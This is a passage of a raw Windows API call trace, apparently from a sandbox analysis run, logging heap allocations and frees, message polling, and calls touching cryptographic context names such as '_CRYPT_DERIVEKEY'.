dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0210.510] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0210.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0210.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0210.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.582] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0210.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0210.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0210.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0210.583] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0210.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0210.583] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0210.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0210.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.584] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.584] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0210.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0210.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0210.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0210.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0210.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0210.585] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0210.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0210.586] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0210.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0210.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0210.639] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0210.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0210.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.641] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0210.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0210.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0210.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 